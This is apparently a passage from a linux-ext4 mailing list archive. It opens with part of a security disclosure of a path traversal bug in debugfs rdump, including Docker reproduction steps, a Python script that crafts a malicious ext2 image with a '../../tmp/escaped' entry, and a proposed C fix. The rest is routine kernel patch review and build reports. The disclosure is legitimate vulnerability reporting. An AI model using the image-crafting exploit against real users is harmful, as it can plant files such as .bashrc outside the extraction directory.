docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker build -f Dockerfile.victim -t e2fs-victim .
```

### Reproduction

```bash
docker run --rm -it e2fs-victim
```

Inside the container:

```bash
# Check home directory — clean
ls -la /home/victim/

# Extract "USB drive" filesystem
/src/debugfs/debugfs /usb/drive.img -R "rdump / /home/victim/extracted"

# Check again — .bashrc appeared OUTSIDE extracted/
ls -la /home/victim/
cat /home/victim/.bashrc
```

**Result:** A `.bashrc` file with attacker-controlled content appears in
`/home/victim/`, not in `/home/victim/extracted/`. The crafted directory
entry `../.bashrc` escaped the dump directory.

### Manual image crafting (without Docker)

```python
#!/usr/bin/env python3
"""Craft ext2 image with path traversal directory entry."""
import struct, subprocess, sys

IMG = sys.argv[1]

# Create normal ext2 image
subprocess.run(['mke2fs', '-t', 'ext2', '-F', '-b', '1024', '-N', '128',
                '-O', '^dir_index', IMG, '4096'], check=True, capture_output=True)

# Write a payload file
with open('/tmp/_payload', 'w') as f:
    f.write('#!/bin/bash\necho PWNED\n')
subprocess.run(['debugfs', '-w', IMG, '-R', 'write /tmp/_payload testfile'],
               capture_output=True)

# Patch directory entry: rename "testfile" → "../../tmp/escaped"
with open(IMG, 'r+b') as f:
    f.seek(1024)
    sb = f.read(1024)
    bs = 1024 << struct.unpack_from('<I', sb, 24)[0]
    isz = struct.unpack_from('<H', sb, 88)[0]
    gd_off = bs * 2 if bs == 1024 else bs
    f.seek(gd_off)
    gd = f.read(64)
    itable = struct.unpack_from('<I', gd, 8)[0]
    f.seek(itable * bs + isz)  # root inode
    ri = f.read(isz)
    rblk = struct.unpack_from('<I', ri, 40)[0]
    f.seek(rblk * bs)
    dd = bytearray(f.read(bs))
    pos = 0
    while pos < bs:
        rl = struct.unpack_from('<H', dd, pos+4)[0]
        nl = dd[pos+6]
        if dd[pos+8:pos+8+nl] == b'testfile':
            evil = b'../../tmp/escaped'
            dd[pos+6] = len(evil)
            dd[pos+8:pos+8+len(evil)] = evil
            break
        if pos + rl >= bs: break
        pos += rl
    f.seek(rblk * bs)
    f.write(dd)

# Trigger: debugfs <IMG> -R "rdump / /tmp/safe"
# Result: /tmp/escaped is created outside /tmp/safe/
```

## Suggested Fix

Validate directory entry names in `rdump_dirent()` and `rdump_inode()`
before using them to construct host filesystem paths. Reject names
containing:
- `/` (slash) anywhere in the name
- `..` as a path component
- NUL bytes

Additionally, validate symlink targets in `rdump_symlink()` to prevent
creating symlinks pointing outside the extraction directory.

Example fix for `rdump_dirent()`:

```c
static int rdump_dirent(struct ext2_dir_entry *dirent, ...) {
    ...
    thislen = ext2fs_dirent_name_len(dirent);
    strncpy(name, dirent->name, thislen);
    name[thislen] = 0;

    /* Reject path traversal in directory entry names */
    if (strchr(name, '/') || strcmp(name, "..") == 0 ||
        strstr(name, "../") || strstr(name, "/..")) {
        com_err("rdump", 0,
                "skipping entry with path traversal: %s", name);
        return 0;
    }
    ...
}
```

## Timeline

- 2026-06-07: Bug discovered during security audit

^ permalink raw reply

* [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Peng Wang @ 2026-06-07 12:49 UTC (permalink / raw)
  To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
	yi.zhang
  Cc: linux-ext4, inux-kernel, Peng Wang

ext4_overwrite_io() decides whether a direct I/O write is an overwrite
(all target blocks already allocated) so the write can proceed under a
shared inode lock.  It calls ext4_map_blocks() once and returns false
if the mapped length is shorter than the requested length.

ext4_map_blocks() maps at most one extent per call.  When a write
straddles two extents (e.g. a written extent and an adjacent unwritten
extent created by fallocate), the single call returns only the first
extent's length.  ext4_overwrite_io() then mis-classifies the write as
non-overwrite and forces the caller to cycle i_rwsem from shared to
exclusive.

On workloads where a DIO writer appends through a fallocated region
while a DIO reader tails the same file, every write that crosses a
written/unwritten extent boundary triggers an exclusive lock
acquisition.  The writer must wait for the reader's shared lock to be
released, and while waiting the RWSEM_FLAG_WAITERS bit blocks all
other shared acquirers.  This serialises all writers to queue-depth 1
and throughput collapses.

Fix by looping ext4_map_blocks() over the remaining range.  As long as
every queried extent reports allocated blocks (written or unwritten),
the function returns true and the write keeps the shared lock.

The *unwritten output now uses OR semantics across extents: set if any
block in the range is unwritten.  This is correct for the two callers:

 - (unaligned_io && unwritten) takes the exclusive lock, which is
   needed if any block requires partial-block zeroing.
 - (ilock_shared && !unwritten) selects ext4_iomap_overwrite_ops,
   which skips journal transactions and is only safe when every block
   is written/mapped.

The loop adds at most one extra ext4_map_blocks() call per extent
boundary, which is negligible compared to the lock contention it
eliminates.

Reproducer: two threads doing O_DIRECT I/O on a fallocated ext4 file.
Thread 1 appends sequentially in 4-16 KB writes.  Thread 2 reads from
the tail of the file in up to 1 MB reads.  Both use the same fd with
the file preallocated via posix_fallocate().

Tested on ext4 over NVMe, 6.6 based kernel:

                              before          after
  writer-only throughput:     399 MB/s        412 MB/s
  mixed (writer + reader):     11 MB/s        381 MB/s
  write latency (mixed):     880 us            21 us
  rwsem_down_write_slowpath
   (5 s sample, mixed):       1792              2

Signed-off-by: Peng Wang <peng_wang@linux.alibaba.com>
---
 fs/ext4/file.c | 25 ++++++++++++++++---------
 1 file changed, 16 insertions(+), 9 deletions(-)

diff --git a/fs/ext4/file.c b/fs/ext4/file.c
index eb1a323962b1..d060de8eddac 100644
--- a/fs/ext4/file.c
+++ b/fs/ext4/file.c
@@ -228,15 +228,22 @@ static bool ext4_overwrite_io(struct inode *inode,
 	map.m_len = EXT4_MAX_BLOCKS(len, pos, blkbits);
 	blklen = map.m_len;

-	err = ext4_map_blocks(NULL, inode, &map, 0);
-	if (err != blklen)
-		return false;
-	/*
-	 * 'err==len' means that all of the blocks have been preallocated,
-	 * regardless of whether they have been initialized or not. We need to
-	 * check m_flags to distinguish the unwritten extents.
-	 */
-	*unwritten = !(map.m_flags & EXT4_MAP_MAPPED);
+	*unwritten = false;
+
+	while (blklen > 0) {
+		map.m_len = blklen;
+		err = ext4_map_blocks(NULL, inode, &map, 0);
+		/*
+		 * err <= 0 means a hole or error; the write needs block
+		 * allocation so it cannot be treated as an overwrite.
+		 */
+		if (err <= 0)
+			return false;
+		if (!(map.m_flags & EXT4_MAP_MAPPED))
+			*unwritten = true;
+		blklen -= err;
+		map.m_lblk += err;
+	}
 	return true;
 }

-- 
2.43.0

^ permalink raw reply related

* [tytso-ext4:dev] BUILD SUCCESS 3ca1d19c1971ac4f25478eafb741e726bf2d5954
From: kernel test robot @ 2026-06-06  2:03 UTC (permalink / raw)
  To: Theodore Ts'o; +Cc: linux-ext4

tree/branch: https://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4.git dev
branch HEAD: 3ca1d19c1971ac4f25478eafb741e726bf2d5954  ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers

elapsed time: 1717m

configs tested: 180
configs skipped: 15

The following configs have been built successfully.
More configs may be tested in the coming days.

tested configs:
alpha                             allnoconfig    gcc-15.2.0
alpha                            allyesconfig    gcc-16.1.0
alpha                               defconfig    gcc-16.1.0
arc                               allnoconfig    gcc-15.2.0
arc                              allyesconfig    gcc-15.2.0
arc                                 defconfig    gcc-16.1.0
arc                            randconfig-001    gcc-8.5.0
arc                   randconfig-001-20260605    gcc-8.5.0
arc                            randconfig-002    gcc-8.5.0
arc                   randconfig-002-20260605    gcc-9.5.0
arm                               allnoconfig    clang-23
arm                                 defconfig    clang-23
arm                            randconfig-001    gcc-16.1.0
arm                   randconfig-001-20260605    gcc-13.4.0
arm                            randconfig-002    gcc-15.2.0
arm                   randconfig-002-20260605    gcc-8.5.0
arm                            randconfig-003    clang-23
arm                   randconfig-003-20260605    clang-23
arm                            randconfig-004    gcc-13.4.0
arm                   randconfig-004-20260605    gcc-15.2.0
arm64                            allmodconfig    clang-19
arm64                             allnoconfig    gcc-15.2.0
arm64                               defconfig    gcc-16.1.0
arm64                 randconfig-001-20260605    gcc-9.5.0
arm64                 randconfig-002-20260605    gcc-10.5.0
arm64                 randconfig-003-20260605    gcc-11.5.0
arm64                 randconfig-004-20260605    clang-23
csky                             allmodconfig    gcc-15.2.0
csky                              allnoconfig    gcc-15.2.0
csky                                defconfig    gcc-16.1.0
csky                  randconfig-001-20260605    gcc-16.1.0
csky                  randconfig-002-20260605    gcc-9.5.0
hexagon                          allmodconfig    clang-23
hexagon                           allnoconfig    clang-23
hexagon                             defconfig    clang-23
hexagon               randconfig-001-20260605    clang-20
hexagon               randconfig-002-20260605    clang-23
i386                             allmodconfig    gcc-14
i386                              allnoconfig    gcc-14
i386                             allyesconfig    gcc-14
i386                 buildonly-randconfig-001    gcc-14
i386        buildonly-randconfig-001-20260605    clang-22
i386                 buildonly-randconfig-002    clang-22
i386        buildonly-randconfig-002-20260605    clang-22
i386                 buildonly-randconfig-003    clang-22
i386        buildonly-randconfig-003-20260605    clang-22
i386                 buildonly-randconfig-004    gcc-14
i386        buildonly-randconfig-004-20260605    clang-22
i386                 buildonly-randconfig-005    gcc-14
i386        buildonly-randconfig-005-20260605    gcc-12
i386                 buildonly-randconfig-006    gcc-14
i386        buildonly-randconfig-006-20260605    gcc-14
i386                                defconfig    clang-22
i386                  randconfig-001-20260605    clang-20
i386                  randconfig-002-20260605    clang-20
i386                  randconfig-003-20260605    gcc-14
i386                  randconfig-004-20260605    gcc-14
i386                  randconfig-005-20260605    clang-20
i386                  randconfig-006-20260605    gcc-14
i386                  randconfig-007-20260605    clang-20
i386                  randconfig-011-20260605    clang-22
i386                  randconfig-012-20260605    clang-22
i386                  randconfig-013-20260605    clang-22
i386                  randconfig-014-20260605    clang-22
i386                  randconfig-015-20260605    clang-22
i386                  randconfig-016-20260605    clang-22
i386                  randconfig-017-20260605    clang-22
loongarch                        allmodconfig    clang-19
loongarch                         allnoconfig    clang-23
loongarch                           defconfig    clang-23
loongarch             randconfig-001-20260605    clang-18
loongarch             randconfig-002-20260605    gcc-16.1.0
m68k                             allmodconfig    gcc-15.2.0
m68k                              allnoconfig    gcc-15.2.0
m68k                             allyesconfig    gcc-16.1.0
m68k                                defconfig    gcc-16.1.0
microblaze                        allnoconfig    gcc-15.2.0
microblaze                       allyesconfig    gcc-15.2.0
microblaze                          defconfig    gcc-16.1.0
mips                             allmodconfig    gcc-15.2.0
mips                              allnoconfig    gcc-15.2.0
mips                             allyesconfig    gcc-15.2.0
nios2                            allmodconfig    gcc-11.5.0
nios2                             allnoconfig    gcc-11.5.0
nios2                               defconfig    gcc-11.5.0
nios2                 randconfig-001-20260605    gcc-8.5.0
nios2                 randconfig-002-20260605    gcc-8.5.0
openrisc                         allmodconfig    gcc-15.2.0
openrisc                          allnoconfig    gcc-15.2.0
openrisc                            defconfig    gcc-16.1.0
parisc                           allmodconfig    gcc-15.2.0
parisc                            allnoconfig    gcc-15.2.0
parisc                           allyesconfig    gcc-15.2.0
parisc                              defconfig    gcc-16.1.0
parisc                randconfig-001-20260605    gcc-14.3.0
parisc                randconfig-002-20260605    gcc-12.5.0
parisc64                            defconfig    gcc-16.1.0
powerpc                          allmodconfig    gcc-15.2.0
powerpc                           allnoconfig    gcc-15.2.0
powerpc               randconfig-001-20260605    gcc-8.5.0
powerpc               randconfig-002-20260605    gcc-8.5.0
powerpc64             randconfig-001-20260605    clang-23
powerpc64             randconfig-002-20260605    gcc-8.5.0
riscv                             allnoconfig    gcc-15.2.0
riscv                               defconfig    clang-23
riscv                          randconfig-001    gcc-8.5.0
riscv                 randconfig-001-20260605    gcc-8.5.0
riscv                          randconfig-002    clang-23
riscv                 randconfig-002-20260605    clang-23
s390                             allmodconfig    clang-18
s390                              allnoconfig    clang-23
s390                             allyesconfig    gcc-15.2.0
s390                                defconfig    clang-18
s390                           randconfig-001    gcc-11.5.0
s390                  randconfig-001-20260605    clang-23
s390                           randconfig-002    clang-23
s390                  randconfig-002-20260605    clang-23
sh                               allmodconfig    gcc-16.1.0
sh                                allnoconfig    gcc-15.2.0
sh                               allyesconfig    gcc-15.2.0
sh                                  defconfig    gcc-16.1.0
sh                             randconfig-001    gcc-16.1.0
sh                    randconfig-001-20260605    gcc-16.1.0
sh                             randconfig-002    gcc-14.3.0
sh                    randconfig-002-20260605    gcc-10.5.0
sparc                             allnoconfig    gcc-15.2.0
sparc                               defconfig    gcc-16.1.0
sparc                 randconfig-001-20260605    gcc-15.2.0
sparc                 randconfig-002-20260605    gcc-16.1.0
sparc64                          allmodconfig    clang-23
sparc64                             defconfig    clang-23
sparc64               randconfig-001-20260605    clang-23
sparc64               randconfig-002-20260605    clang-23
um                               allmodconfig    clang-19
um                                allnoconfig    clang-23
um                               allyesconfig    gcc-14
um                                  defconfig    clang-23
um                             i386_defconfig    gcc-14
um                    randconfig-001-20260605    clang-19
um                    randconfig-002-20260605    clang-23
um                           x86_64_defconfig    clang-23
x86_64                           allmodconfig    clang-22
x86_64                            allnoconfig    clang-20
x86_64                           allyesconfig    clang-22
x86_64               buildonly-randconfig-001    gcc-12
x86_64      buildonly-randconfig-001-20260605    gcc-14
x86_64               buildonly-randconfig-002    clang-20
x86_64      buildonly-randconfig-002-20260605    gcc-14
x86_64               buildonly-randconfig-003    gcc-14
x86_64      buildonly-randconfig-003-20260605    gcc-14
x86_64               buildonly-randconfig-004    gcc-14
x86_64      buildonly-randconfig-004-20260605    gcc-14
x86_64               buildonly-randconfig-005    gcc-14
x86_64      buildonly-randconfig-005-20260605    gcc-14
x86_64               buildonly-randconfig-006    clang-20
x86_64      buildonly-randconfig-006-20260605    gcc-14
x86_64                              defconfig    gcc-14
x86_64                randconfig-001-20260605    clang-22
x86_64                randconfig-002-20260605    clang-22
x86_64                randconfig-003-20260605    clang-22
x86_64                randconfig-004-20260605    gcc-13
x86_64                randconfig-005-20260605    clang-22
x86_64                randconfig-006-20260605    gcc-14
x86_64                randconfig-011-20260605    clang-22
x86_64                randconfig-012-20260605    gcc-14
x86_64                randconfig-013-20260605    clang-22
x86_64                randconfig-014-20260605    clang-22
x86_64                randconfig-015-20260605    gcc-14
x86_64                randconfig-016-20260605    clang-22
x86_64                randconfig-071-20260605    gcc-14
x86_64                randconfig-072-20260605    gcc-14
x86_64                randconfig-073-20260605    clang-20
x86_64                randconfig-074-20260605    gcc-14
x86_64                randconfig-075-20260605    gcc-12
x86_64                randconfig-076-20260605    gcc-14
x86_64                          rhel-9.4-rust    clang-22
xtensa                           alldefconfig    gcc-16.1.0
xtensa                            allnoconfig    gcc-15.2.0
xtensa                randconfig-001-20260605    gcc-8.5.0
xtensa                randconfig-002-20260605    gcc-8.5.0

--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki

^ permalink raw reply

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-05 20:54 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags which to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.

Please don't try to help.

^ permalink raw reply

* Re: [PATCH 00/17] replace __get_free_pages() call with kmalloc()
From: Zi Yan @ 2026-06-05 20:00 UTC (permalink / raw)
  To: Mike Rapoport (Microsoft)
  Cc: Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi, Ryusuke Konishi,
	Viacheslav Dubeyko, Trond Myklebust, Anna Schumaker, Chuck Lever,
	Jeff Layton, NeilBrown, Olga Kornievskaia, Dai Ngo, Tom Talpey,
	Alexander Viro, Christian Brauner, Jan Kara, Dave Kleikamp,
	Theodore Ts'o, Miklos Szeredi, Andreas Hindborg, Breno Leitao,
	Kees Cook, Tigran A. Aivazian, linux-kernel, linux-fsdevel,
	ocfs2-devel, linux-nilfs, linux-nfs, jfs-discussion, linux-ext4,
	linux-mm
In-Reply-To: <20260523-b4-fs-v1-0-275e36a83f0e@kernel.org>

On 23 May 2026, at 13:54, Mike Rapoport (Microsoft) wrote:

> This is a (small) part of larger work of replacing page allocator calls
> with kmalloc.

Is the goal to get rid of __get_free_page(s)()?

Thanks.

>
> Also in git:
> https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/fs
>
> Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
> ---
> Mike Rapoport (Microsoft) (17):
>       quota: allocate dquot_hash with kmalloc()
>       proc: replace __get_free_page() with kmalloc()
>       ocfs2/dlm: replace __get_free_page() with kmalloc()
>       nilfs2: replace get_zeroed_page() with kzalloc()
>       NFS: replace __get_free_page() with kmalloc() in nfs_show_devname()
>       NFS: remove unused page and page2 in nfs4_replace_transport()
>       NFSD: replace __get_free_page() with kmalloc() in nfsd_buffered_readdir()
>       libfs: simple_transaction_get(): replace get_zeroed_page() with kzalloc()
>       jfs: replace __get_free_page() with kmalloc()
>       jbd2: replace __get_free_pages() with kmalloc()
>       isofs: replace __get_free_page() with kmalloc()
>       fuse: replace __get_free_page() with kmalloc()
>       fs/select: replace __get_free_page() with kmalloc()
>       fs/namespace: use __getname() to allocate mntpath buffer
>       configfs: replace __get_free_pages() with kzalloc()
>       binfmt_misc: replace __get_free_page() with kmalloc()
>       bfs: replace get_zeroed_page() with kzalloc()
>
>  fs/bfs/inode.c             |  4 ++--
>  fs/binfmt_misc.c           |  4 ++--
>  fs/configfs/file.c         |  7 +++----
>  fs/fuse/ioctl.c            |  5 +++--
>  fs/isofs/dir.c             |  5 +++--
>  fs/jbd2/journal.c          |  7 ++-----
>  fs/jfs/jfs_dtree.c         | 16 ++++++++--------
>  fs/libfs.c                 |  6 +++---
>  fs/namespace.c             |  4 ++--
>  fs/nfs/nfs4namespace.c     | 15 +--------------
>  fs/nfs/super.c             |  4 ++--
>  fs/nfsd/vfs.c              |  4 ++--
>  fs/nilfs2/ioctl.c          |  4 ++--
>  fs/ocfs2/dlm/dlmdebug.c    | 24 +++++++++---------------
>  fs/ocfs2/dlm/dlmdomain.c   |  8 +++++---
>  fs/ocfs2/dlm/dlmmaster.c   |  5 ++---
>  fs/ocfs2/dlm/dlmrecovery.c |  4 ++--
>  fs/proc/base.c             | 16 ++++++++--------
>  fs/quota/dquot.c           | 11 +++++------
>  fs/select.c                |  4 ++--
>  20 files changed, 68 insertions(+), 89 deletions(-)
> ---
> base-commit: 5d6919055dec134de3c40167a490f33c74c12581
> change-id: 20260522-b4-fs-5e5c70f31664
>
> Best regards,
> --
> Sincerely yours,
> Mike.


Best Regards,
Yan, Zi

^ permalink raw reply

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Matthew Wilcox @ 2026-06-05 14:24 UTC (permalink / raw)
  To: Jia Zhu
  Cc: Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <20260605090253.32822-1-zhujia.zj@bytedance.com>

On Fri, Jun 05, 2026 at 05:02:53PM +0800, Jia Zhu wrote:
> On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> > Is this a common case for you, or is this something you noticed by
> > inspection?
> 
> This was found by our kernel release benchmark.  We run libMicro as part
> of that test suite:
> 
>   https://github.com/rzezeski/libMicro
> 
> The regression shows up in buffered write/pwrite/writev overwrite tests
> on ext4 large folios.

Makes sense.  I'll assume this can correspond to a reasonable workload.
It certainly seems like something that could exist.

> > Wouldn't you get just as much benefit from this?
> 
> Yes.  I tested this approach, and it gives almost the same result as my
> original partial-commit helper.

Excellent!  Obviously it'd be even better if we didn't have to walk the
leading buffer_heads ... but there's no way to do this with the data
structure we have.

> Agreed.  The original ext4_block_write_begin() change was too aggressive.
> Seeking directly to @from also skips the prefix buffers, which makes the
> old side effects harder to prove.
> 
> For v2 I plan to drop that part and keep the existing walk from the head.
> The ext4 change would only stop after @to when the folio was already
> uptodate on entry, similar to your block_commit_write() suggestion:
> 
> +       bool folio_uptodate = folio_test_uptodate(folio);
> +
>         for (bh = head, block_start = 0;
> -            bh != head || !block_start;
> +            (bh != head || !block_start) &&
> +            (!folio_uptodate || block_start < to);
>              block++, block_start = block_end, bh = bh->b_this_page) {
>                 ...
>         }

Yes, I think that's a good approach.

> So the prefix path and all in-range handling stay unchanged.  The only
> skipped work is the tail part after @to, and only for a folio that was
> already uptodate before write_begin() started.
> 
> > ... converting ext4 to use iomap instead of buffer heads.
> 
> I strongly agree that iomap is the right direction for ext4.  The iomap
> buffered write path would make this particular buffer-head walk cost go
> away.
> 
> The reason I am still looking at this path is that the regression is
> visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
> by the ext4 large-folio enablement in v6.16.  For example, in our
> libMicro release benchmark with THP always enabled, usecs/call, lower is
> better:
> 
> case        v6.12        v6.18        regression
> write_u1k   0.609        4.659        +665.0%
> write_u10k  1.408        4.869        +245.8%

Ouch ;-)  No wonder you want to address this.  Do you recover all the
regression with this fix?

> The iomap conversion is the long-term fix, but it does not help kernels
> which still use the buffer-head buffered write path.  I would like to keep
> this as a small regression fix for that path, and make it minimal enough
> to be suitable for stable/LTS backport.

Is it that you're using some ext4 features that aren't supported by
iomap yet?  Could you say which ones?  That might motivate someone to
prioritise that support.

> Would this v2 direction look OK to you?

Absolutely.  Very happy with this approach.

^ permalink raw reply

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Uladzislau Rezki @ 2026-06-05  9:50 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags which to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.
> 
I assume you mean kvmalloc()? kvalloc() is something unknown to me.

--
Uladzislau Rezki

^ permalink raw reply

* Re: [PATCH] ext4: avoid full buffer walks for large folio partial writes
From: Jia Zhu @ 2026-06-05  9:02 UTC (permalink / raw)
  To: Matthew Wilcox
  Cc: Jia Zhu, Theodore Ts'o, Andreas Dilger, Alexander Viro,
	Christian Brauner, Jan Kara, Baokun Li, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, linux-ext4, linux-fsdevel, linux-kernel
In-Reply-To: <aiBuZE5NWMfOGAA6@casper.infradead.org>

On Wed, Jun 03, 2026 at 07:11:48PM +0100, Matthew Wilcox wrote:
> Is this a common case for you, or is this something you noticed by
> inspection?

This was found by our kernel release benchmark.  We run libMicro as part
of that test suite:

  https://github.com/rzezeski/libMicro

The regression shows up in buffered write/pwrite/writev overwrite tests
on ext4 large folios.

> Wouldn't you get just as much benefit from this?

Yes.  I tested this approach, and it gives almost the same result as my
original partial-commit helper.

I agree this is a better direction for block_commit_write().  It keeps the
existing buffer-head state handling and only stops the tail walk after an
already-uptodate folio has been committed through @to.  That removes the
main large-folio cost in our small-overwrite benchmark while keeping the
change much closer to the old code.

> I'm unconvinced that this is safe ...

Agreed.  The original ext4_block_write_begin() change was too aggressive.
Seeking directly to @from also skips the prefix buffers, which makes the
old side effects harder to prove.

For v2 I plan to drop that part and keep the existing walk from the head.
The ext4 change would only stop after @to when the folio was already
uptodate on entry, similar to your block_commit_write() suggestion:

+       bool folio_uptodate = folio_test_uptodate(folio);
+
        for (bh = head, block_start = 0;
-            bh != head || !block_start;
+            (bh != head || !block_start) &&
+            (!folio_uptodate || block_start < to);
             block++, block_start = block_end, bh = bh->b_this_page) {
                ...
        }

So the prefix path and all in-range handling stay unchanged.  The only
skipped work is the tail part after @to, and only for a folio that was
already uptodate before write_begin() started.

> ... converting ext4 to use iomap instead of buffer heads.

I strongly agree that iomap is the right direction for ext4.  The iomap
buffered write path would make this particular buffer-head walk cost go
away.

The reason I am still looking at this path is that the regression is
visible in our LTS upgrade testing from 6.12 to 6.18.  It was introduced
by the ext4 large-folio enablement in v6.16.  For example, in our
libMicro release benchmark with THP always enabled, usecs/call, lower is
better:

case        v6.12        v6.18        regression
write_u1k   0.609        4.659        +665.0%
write_u10k  1.408        4.869        +245.8%

The iomap conversion is the long-term fix, but it does not help kernels
which still use the buffer-head buffered write path.  I would like to keep
this as a small regression fix for that path, and make it minimal enough
to be suitable for stable/LTS backport.

Would this v2 direction look OK to you?

^ permalink raw reply

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: David Laight @ 2026-06-05  8:33 UTC (permalink / raw)
  To: Theodore Tso
  Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
	Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>

On Thu, 4 Jun 2026 10:05:52 -0400
"Theodore Tso" <tytso@mit.edu> wrote:

...
> I suppose we could do it with kmalloc() with some flags which to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc().  Is there a better way?

There is already kvalloc().
I'm not sure how hard that tries to get kmalloc() to succeed.

-- David

> 
> Thanks,
> 
> 					- Ted
> 


^ permalink raw reply

* Re: [PATCH RFC 10/17] ext4: use fast incremental CRC update in ext4_free_inode()
From: Baokun Li @ 2026-06-05  7:55 UTC (permalink / raw)
  To: Theodore Tso; +Cc: linux-ext4, sashiko
In-Reply-To: <h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit>

On 2026/6/3 22:17, Theodore Tso wrote:
> On Fri, May 08, 2026 at 11:33:05PM +0000, sashiko-bot@kernel.org wrote:
>> Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
>> - [High] ext4_inode_bitmap_csum_set_fast() corrupts the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not a multiple of 8.
>>
>>> -	ext4_inode_bitmap_csum_set(sb, gdp, bitmap_bh);
>>> +	ext4_inode_bitmap_csum_set_fast(sb, gdp, bit);
>> Can this corrupt the inode bitmap checksum if EXT4_INODES_PER_GROUP(sb) is not
>> a multiple of 8?
>>
>> In ext4_inode_bitmap_csum_set(), the CRC32c checksum is computed over exactly
>> EXT4_INODES_PER_GROUP(sb) >> 3 bytes. If s_inodes_per_group is not a multiple
>> of 8, any trailing fractional bits are strictly excluded from the checksum
>> calculation.
>>
>> Because ext4_fill_super() does not enforce that s_inodes_per_group is a
>> multiple of 8, a crafted filesystem can have an unaligned s_inodes_per_group.
> The reason why ext4_fill_super() doesn't enforce that
> s_inodes_per_group is a multiple of 8 was that a long time ago, back
> when Android was allergic to GPLv2 in userspace, they implemented
> their own version of mke2fs (and didn't run fsck on the file system,
> sigh).  Their MIT licensed version of make_ext4fs would occasionally
> make file systems that were not a multiple of 8, and this ran afoul of
> e2fsck[1] if someone actually tried to repair a corrupted Android user
> data file system (as opposed to just wiping the flash and starting
> from scratch).
>
> [1] https://sourceforge.net/p/e2fsprogs/bugs/292/
>
> This was fixed long ago (over a decade ago), and so at this point, I'm
> pretty sure any such mobile handsets are in the landfill, so we
> probably should fix this by adding a check in ext4_fill_super() and a
> corresponding check in e2fsck.
>
> 					- Ted

Hi Ted,

Thank you for your information and suggestions.

I will send two fix patches to synchronize the checks in mke2fs
with ext4_fill_super and e2fsck.


Thanks,
Baokun


^ permalink raw reply

* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Disha Goel @ 2026-06-05  7:02 UTC (permalink / raw)
  To: Darrick J. Wong
  Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
	ojaswin
In-Reply-To: <20260604145434.GG6095@frogsfrogsfrogs>

On 04/06/26 8:24 pm, Darrick J. Wong wrote:
